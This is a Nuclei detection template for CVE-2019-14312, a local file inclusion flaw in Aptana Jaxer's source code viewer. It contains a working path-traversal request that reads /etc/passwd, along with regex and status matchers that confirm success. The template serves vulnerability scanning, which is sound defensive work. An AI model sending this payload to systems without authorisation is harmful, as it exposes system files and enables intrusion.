nuclei-templates/cves/2019/CVE-2019-14312.yaml

28 lines
836 B
YAML

id: CVE-2019-14312
info:
name: Aptana Jaxer 1.0.3.4547 - Local File inclusion
author: daffainfo
severity: high
description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
reference: |
- https://www.exploit-db.com/exploits/47214
- https://www.cvedetails.com/cve/CVE-2019-14312
tags: cve,cve2019,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200